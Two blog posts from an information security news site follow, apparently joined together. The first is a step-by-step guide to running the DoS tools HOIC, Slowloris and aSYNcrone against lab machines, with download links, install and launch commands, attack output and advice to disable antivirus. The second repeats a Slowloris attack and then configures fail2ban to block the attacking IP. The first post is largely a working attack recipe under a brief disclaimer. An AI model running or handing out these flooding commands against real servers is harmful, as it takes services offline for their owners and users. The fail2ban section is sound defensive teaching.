We will show you popular tools which are used in DOS attacks.

NOTE: Do not run these test on production systems, this is for for informational and educational purposes only

HOIC (High Orbit ION Cannon)

HOIC is the newest version of LOIC Low Orbit Ion Cannon which is used in attacking on web application. But the LOIC sometimes becomes unstable. HOIC works fine while we tested this on Windows 7. User have to enter only the IP address & select the no. of threads. These threads indicates the amount of data packets user want to flood. Sometimes this tool cause very damage.

HOIC (High Orbit ION Cannon)

• We have tested this tool on Windows 7 32 BIT Build Verison 7601 Hardware Specs – i5 7200 CPU 2.71 GHZ (Attacker – 10.10.11.17). If user too much of thread value. HOIC will close automatically.

Attacker – 10.10.11.17 =============== Victim – 10.10.11.145

• Download HOIC : https://sourceforge.net/projects/high-orbit-ion-cannon/
• Might Your antivirus or any other program shows that HOIC is malicious. Disable your antivirus before using HOIC.

• Below is the another attacking machine of Windows 7 64 Bit 7600 (Victim – 10.10.11.145). For checking the bandwidth usage we have used BitMeter OS.
• Download BitMeter OS : https://codebox.net/pages/bitmeteros-downloads
• Before DOS we can see that Victim CPU and resources was working normally.

• After running DOS using HIOC we can see the utilization of victim machine with HOIC.

• Above shows high bandwidth on target machine. Which makes the RAM & CPU unresponsive as all resources become due high level of bandwidth transfer.
• You can also check the ethernet statistics using netstat stats. Open CMD as administrator. Type netstat -e
• Before Interface Statistics.

• After starting attack, Interface stats got increase because of high traffic.

• Above ethernet stats shows bandwidth has increases. For checking Interface statistics rest of ethernet statistics you can use netstat -e for rest of attacking machine.

Slowloris

Slowloris is another popular tool used in DOS attack slow but effective. Slowloris is designed to send HTTP requests to server. Web server gets flooded with GET request & server resources become overflow to handle GET request. But we will send request to local computer. Slowloris does not have heavy impact to the computer. It just sends packets to designated IP address in large number.

• For attacking we will use Kali Linux 2018.4 amd64.
• And on victim side we will use Windows 7 32 BIT Build Verison 7600 Hardware Specs – i5 7200 CPU 2.71 GHZ .
• For checking we earlier started Wireshark in victim machine.
• For using slowloris python must be installed.
• To install slowloris type sudo apt-get update
• Then type sudo apt-get install python
• Type git clone https://github.com/gkbrk/slowloris.git
• Type sudo cd slowloris & then type chmod u+x setup.py
• Type python setup.py install
• Type python slowloris <target Ip address>

root@kali:/home/iicybersecurity/slowloris# python slowloris.py 10.10.11.123
 [18-12-2019 00:18:22] Attacking 10.10.11.123 with 150 sockets.
 [18-12-2019 00:18:22] Creating sockets…
 [18-12-2019 00:18:22] Sending keep-alive headers… Socket count: 31
 [18-12-2019 00:18:37] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:18:52] Sending keep-alive headers… Socket count: 7
 [18-12-2019 00:19:07] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:19:22] Sending keep-alive headers… Socket count: 0
 [18-12-2019 00:19:37] Sending keep-alive headers… Socket count: 2
 [18-12-2019 00:19:52] Sending keep-alive headers… Socket count: 4
 [18-12-2019 00:20:07] Sending keep-alive headers… Socket count: 6
 [18-12-2019 00:20:22] Sending keep-alive headers… Socket count: 6
 [18-12-2019 00:20:37] Sending keep-alive headers… Socket count: 1
 [18-12-2019 00:20:52] Sending keep-alive headers… Socket count: 1

• After executing above command. Slowloris will start sending data packets to target ip address.
• Above we have already configured wireshark to analyze local network.
• Below shows the receiving of high traffic on victim machine.

• Above screenshot stated that wireshark has captured the receiving of data packets. Slowloris does make any impact on target machine.
• Slowloris can easily blocked by target machine. Slowloris can be found in exceptional form.
• Below are the list of user agents, which slowloris uses to attack on web server.

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]

aSYNchrone

aSYNchrone is another DOS tool which is used in DOS attack. Asynchrone sends SYN packets to target IP address or web server. This consumes the target web server resources and make it unresponsive. It sends the data packets effectively. aSYNchrone is written in C.

• For testing we have used Ubuntu 18.04.
• And on victim side we will use Windows 7 32 BIT Build Verison 7601 Hardware Specs – i5 7200 CPU 2.71 GHZ .
• Open terminal type git clone https://github.com/fatih4842/aSYNcrone.git

root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/fatih4842/aSYNcrone.git
 Cloning into 'aSYNcrone'…
 remote: Enumerating objects: 24, done.
 remote: Counting objects: 100% (24/24), done.
 remote: Compressing objects: 100% (21/21), done.
 remote: Total 24 (delta 6), reused 11 (delta 2), pack-reused 0
 Unpacking objects: 100% (24/24), done.

• Type cd aSYNchrone & type
• Type gcc aSYNcrone.c -o aSYNcrone -lpthread

root@ubuntu:/home/iicybersecurity/Downloads# cd aSYNcrone/
root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# ls
 aSYNcrone.c  README.md  src
root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# gcc aSYNcrone.c -o aSYNcrone -lpthread
 aSYNcrone.c: In function ‘bilgi’:
 aSYNcrone.c:158:20: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘long unsigned int’ [-Wformat=]
              printf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);
                     ^~~~~~~~~
 aSYNcrone.c:158:50: note: format string is defined here
              printf("\n\nNumber of PACKETS: "YSL"%d"RESET" \t Attack Time: "YSL"%.2f"RESET" second \n\n"RESET, p_sayi, zaman_farki);
                                                  ~^
                                                  %ld

• After then type ./aSYNcrone 80 10.10.11.145 21 1000

root@ubuntu:/home/iicybersecurity/Downloads/aSYNcrone# ./aSYNcrone 80 10.10.11.145 21 1000

 █████╗ ███████╗██╗   ██╗███╗   ██╗ ██████╗██████╗  ██████╗ ███╗   ██╗███████╗
██╔══██╗██╔════╝╚██╗ ██╔╝████╗  ██║██╔════╝██╔══██╗██╔═══██╗████╗  ██║██╔════╝
███████║███████╗ ╚████╔╝ ██╔██╗ ██║██║     ██████╔╝██║   ██║██╔██╗ ██║█████╗
██╔══██║╚════██║  ╚██╔╝  ██║╚██╗██║██║     ██╔══██╗██║   ██║██║╚██╗██║██╔══╝
██║  ██║███████║   ██║   ██║ ╚████║╚██████╗██║  ██║╚██████╔╝██║ ╚████║███████╗
╚═╝  ╚═╝╚══════╝   ╚═╝   ╚═╝  ╚═══╝ ╚═════╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝

┌┐ ┬ ┬  ╦╔═┌─┐┬─┐┌─┐┌─┐┬  ┌┬┐┌─┐┌─┐  ╔═╗┬ ┬┌┐ ┌─┐┬─┐  ╔╦╗┌─┐┌─┐┌┬┐
├┴┐└┬┘  ╠╩╗├─┤├┬┘├─┤├┤ │  │││├─┤└─┐  ║  └┬┘├┴┐├┤ ├┬┘   ║ ├┤ ├─┤│││
└─┘ ┴   ╩ ╩┴ ┴┴└─┴ ┴└─┘┴─┘┴ ┴┴ ┴└─┘  ╚═╝ ┴ └─┘└─┘┴└─   ╩ └─┘┴ ┴┴ ┴

[+] IP_HDRINCL success!
 [+] Attack has been started!

 Number of PACKETS: 7624174       Attack Time: 148.00 second

• Below shows the bandwidth usage by CPU was normal before attack.

• Above shows that attack has started. As you can see a high increase in victim resources on Bitmeter OS. Ethical Hacking researcher of International institute of Cyber Security these tools are enhanced by hackers to impact more, there are many ways to prevent DOS attacks.

• Above shows the high bandwidth & high CPU, RAM usage of the target computer.

The post TOP DOS (Denial of Service) TOOLS – STEP BY STEP GUIDE appeared first on Information Security Newspaper | Hacking News.

Fail2Ban is used to block suspicious IP address which are sending multiple requests on Server IP address. Fail2ban scans the logs file & blocks IP addresses which has make too many login attempts. Fail2ban updates the firewall policy to deny new connection from suspicious IP addresses.

DOS Attack From Ubuntu OS

• Here we will run DOS attack using slowloris. Slowloris is very common tool used in DOS attacks.
• Open terminal on Ubuntu machine (Attacker)
  • Type sudo apt-get update
  • Type sudo apt-get install python3
  • Type sudo apt-get install python3-pip
• Type pip3 –version

root@ubuntu:/home/iicybersecurity# pip3 --version
 pip 9.0.1 from /usr/lib/python3/dist-packages (python 3.6)

• Type pip3 install slowloris

root@ubuntu:/home/iicybersecurity# pip3 install slowloris
 Collecting slowloris
   Downloading https://files.pythonhosted.org/packages/a6/37/5ae3d027727122039f52a22d278f1d73f564e03e5fdb93f10e3a2f26aa06/Slowloris-0.2.0.tar.gz
 Building wheels for collected packages: slowloris
   Running setup.py bdist_wheel for slowloris … done
   Stored in directory: /root/.cache/pip/wheels/bd/a1/f1/35dd5184db4e890b6ff5c992ff1f7a1b8b30e9bcd89aa6f7ba
 Successfully built slowloris
 Installing collected packages: slowloris
 Successfully installed slowloris-0.2.0

• Type slowloris –help

root@ubuntu:/home/iicybersecurity# slowloris --help
 usage: slowloris [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x]
                  [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT] [--https]
                  [--sleeptime SLEEPTIME]
                  [host]
 Slowloris, low bandwidth stress test tool for websites
 positional arguments:
   host                  Host to perform stress test on
 optional arguments:
   -h, --help            show this help message and exit
   -p PORT, --port PORT  Port of webserver, usually 80
   -s SOCKETS, --sockets SOCKETS
                         Number of sockets to use in the test
   -v, --verbose         Increases logging
   -ua, --randuseragents
                         Randomizes user-agents with each request
   -x, --useproxy        Use a SOCKS5 proxy for connecting
   --proxy-host PROXY_HOST
                         SOCKS5 proxy host
   --proxy-port PROXY_PORT
                         SOCKS5 proxy port
   --https               Use HTTPS for the requests
   --sleeptime SLEEPTIME
                         Time to sleep between each header sent.

• Type slowloris 192.168.1.9 this command will start normal dos attack to victim machine (Kali machine).

• Above screenshot of wireshark shows the receiving of TCP packets. As victim is running with apache2 service. By default slowloris send multiple data packets on port 80.
• Above shows very simple scenario that how dos attack is stimulated. For defending such dos attacks. we will use fail2ban.

Victim/ Defender Machine – Kali OS

Fail2Ban Installation

• We will testing on Linux Distros. On attacking we will use Ubuntu 18.04 & on victim-defend we will use Kali Linux on.
• Kali Linux (Victim & Defender) – 192.168.1.9
• Ubuntu (Attacker) – 192.168.1.8
• For Installation on Kali Linux. Open terminal
  • Type sudo apt-get update
  • Type sudo apt-get install fail2ban
• Type sudo service apache2 start
• Type sudo systemctl status apache2

root@kali:/etc/fail2ban# sudo systemctl status apache2
 ● apache2.service - The Apache HTTP Server
    Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
    Active: active (running) since Tue 2019-11-05 02:09:37 EST; 2h 47min ago
   Process: 4749 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
  Main PID: 4753 (/usr/sbin/apach)
     Tasks: 152 (limit: 4662)
    Memory: 91.3M
    CGroup: /system.slice/apache2.service
            ├─4753 /usr/sbin/apache2 -k start
            ├─4754 /usr/sbin/apache2 -k start
            ├─6073 /usr/sbin/apache2 -k start
            ├─6074 /usr/sbin/apache2 -k start
            ├─6075 /usr/sbin/apache2 -k start
            ├─6077 /usr/sbin/apache2 -k start
            ├─6079 /usr/sbin/apache2 -k start
            ├─6080 /usr/sbin/apache2 -k start
            ├─6081 /usr/sbin/apache2 -k start
            ├─6083 /usr/sbin/apache2 -k start
            ├─6084 /usr/sbin/apache2 -k start
            ├─6085 /usr/sbin/apache2 -k start
            ├─6086 /usr/sbin/apache2 -k start
            ├─6087 /usr/sbin/apache2 -k start
            ├─6088 /usr/sbin/apache2 -k start
            ├─6089 /usr/sbin/apache2 -k start
            ├─6090 /usr/sbin/apache2 -k start
            ├─6091 /usr/sbin/apache2 -k start
            ├─6092 /usr/sbin/apache2 -k start
            ├─6093 /usr/sbin/apache2 -k start
            ├─6094 /usr/sbin/apache2 -k start

• Press Ctrl+c
• Before starting fail2ban service. We have to configure it. For that
  • Type cd /etc/fail2ban.
  • Type nano jail.conf
• Here change
  • bantime = 30
  • findtime = 50
  • maxretry = 10
• Then enter enabled = true after [apache-auth], [apache-badbots], [apache-noscript] & [apache-overflows] as shown below.

ignorecommand = /path/to/command 
 ignorecommand =
 "bantime" is the number of seconds that a host is banned.
 bantime  = 30
 A host is banned if it has generated "maxretry" during the last "findtime"
 seconds.
 findtime  = 50
 "maxretry" is the number of failures before a host get banned.
 maxretry = 10

HTTP servers
 #
 [apache-auth]
 enabled  = true
 port     = http,https
 logpath  = %(apache_error_log)s

 [apache-badbots]
 Ban hosts which agent identifies spammer robots crawling the web
 for email addresses. The mail outputs are buffered.
 enabled  = true
 port     = http,https
 logpath  = %(apache_access_log)s
 bantime  = 48h
 maxretry = 1

[apache-noscript]
 enabled  = true
 port     = http,https
 logpath  = %(apache_error_log)s

 [apache-overflows]
 enabled  = true
 port     = http,https
 logpath  = %(apache_error_log)s
 maxretry = 2

• Type sudo nano /etc/fail2ban/jail.local & copy the below text. You can also change maxretry, findtime under [apache] section.

 [apache]
enabled  = true 
port     = http,https 
filter   = apache-auth 
logpath  = /var/log/apache2/*error.log 
maxretry = 2
findtime = 50
ignoreip =  

• Type sudo /etc/init.d/fail2ban start

root@kali:/etc/fail2ban# sudo /etc/init.d/fail2ban start
 [ ok ] Starting fail2ban (via systemctl): fail2ban.service.
 root@kali:/etc/fail2ban#

• Save the file & type sudo systemctl status fail2ban.service

root@kali:/etc/fail2ban# sudo systemctl status fail2ban.service
 ● fail2ban.service - Fail2Ban Service
    Loaded: loaded (/lib/systemd/system/fail2ban.service; disabled; vendor preset: disabled)
    Active: active (running) since Tue 2019-11-05 05:02:20 EST; 3s ago
      Docs: man:fail2ban(1)
   Process: 6475 ExecStartPre=/bin/mkdir -p /var/run/fail2ban (code=exited, status=0/SUCCESS)
  Main PID: 6476 (fail2ban-server)
     Tasks: 13 (limit: 4662)
    Memory: 17.9M
    CGroup: /system.slice/fail2ban.service
            └─6476 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
 Nov 05 05:02:20 kali systemd[1]: Starting Fail2Ban Service…
 Nov 05 05:02:20 kali systemd[1]: Started Fail2Ban Service.
 Nov 05 05:02:21 kali fail2ban-server[6476]: Server ready

Attacker Machine – Ubuntu OS

• Type slowloris 192.168.1.9 -p 80 & slowloris will start sending packets to target IP address.
• 192.168.1.9 is the target IP address
• -p to mention port no. Using port 80 it will generate the traffic.

root@ubuntu:/home/iicybersecurity# slowloris 192.168.1.9 -p 80
 [05-11-2019 02:08:59] Attacking 192.168.1.9 with 150 sockets.
 [05-11-2019 02:08:59] Creating sockets…
 [05-11-2019 02:08:59] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:14] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:29] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:44] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:09:59] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:14] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:29] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:10:44] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:00] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:15] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:30] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:11:45] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:00] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:15] Sending keep-alive headers… Socket count: 150
 [05-11-2019 02:12:30] Sending keep-alive headers… Socket count: 150

Victim/ Defender Machine

• Now go to victim machine Kali Linux. In the Wireshark, you will notice DOS from attacker machine to target IP address.
• Type sudo fail2ban-client set apache banip 192.168.1.8
• This command will block the target IP address. Below screenshot shows that 192.168.1.8 has blocked.

• Above screenshot shows that none of the packets are receiving from target machine.
• Now if you check fail2ban status. You will notice that attacker IP has been blocked because attacker was sending multiple packets.
• For checking status open another terminal type sudo fail2ban-client status apache

root@kali:/var/log/apache2# sudo fail2ban-client status apache
 Status for the jail: apache
 |- Filter
 |  |- Currently failed: 0
 |  |- Total failed:     1
 |  - File list:        /var/log/apache2/error.log - Actions
    |- Currently banned: 1
    |- Total banned:     1
    `- Banned IP list:   192.168.1.8

• Above status that attacker machine (Ubuntu) 192.168.1.8 is now blocked.

The post DOS Prevention – Step by step guide appeared first on Information Security Newspaper | Hacking News.